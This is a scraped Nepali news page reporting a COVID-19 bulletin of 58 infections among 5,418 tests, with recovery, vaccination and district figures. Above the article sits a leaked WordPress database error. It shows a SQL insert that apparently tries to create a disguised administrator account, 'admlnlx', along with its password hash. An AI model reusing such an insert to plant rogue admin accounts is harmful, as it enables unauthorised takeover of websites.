WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTpXW.vPnB5gyfizYlUzpdhG1uXOWc1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 14:11:13', '', 'admlnlx', 'admlnlx')

पाँच हजार परीक्षण हुँदा ५८ जनामा सङ्क्रमण – Gaule Khabar

पाँच हजार परीक्षण हुँदा ५८ जनामा सङ्क्रमण

पाँच हजार परीक्षण हुँदा ५८ जनामा सङ्क्रमण

काठमाण्डौ । कोरोना भाइरसको सङ्क्रमण घट्दै गइरहेको छ । आज स्वास्थ्य तथा जनसङ्ख्या मन्त्रालयले आज सार्वजनिक गरेको बुलेटिनमा पाँच हजार ४१८ जनामा कोरोना परीक्षण गर्दा ५८ जनामा सङ्क्रमण देखिएको छ ।

मन्त्रालयका अनुसार सक्रिय सङ्क्रमितको सङ्ख्या चार हजार ८१९ जना रहेको छ । पछिल्लो समय १४८ जना कोरोनाबाट निको भएर घर फर्किएका छन् । योसँगै निको हुनेको सङ्ख्या नौ लाख ६१ हजार २१८ पुगेको छ । निको हुने दर ९८।३ प्रतिशत रहेको मन्त्रालयले जनाएको छ । आज सङ्क्रमणबाट कसैको पनि निधन भएको छैन ।

मन्त्रालयका अनुसार २०० भन्दाबढी सङ्क्रमित भएका जिल्लामा ललितपुर, काठमाडौँ, चितवन, कास्की, बाँके र रुपन्देही रहेका छन् । शून्य सङ्क्रमित भएको दुई मात्र जिल्ला मनाङ र जुम्ला रहेको छ ।

नेपालमा सङ्क्रमण दर १७।८ प्रतिशत रहेको छ । हाल होम आइसोलेसनमा चार हजार ८१९, संस्थागत आइसोलेसनमा ९८, आइसियुमा ३५ र भेन्टिलेटरमा छ जनाको उपचार हुँदैछ । विगत २४ घण्टामा आज ९२ हजार ४८ जनाले खोप लगाएका छन् । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका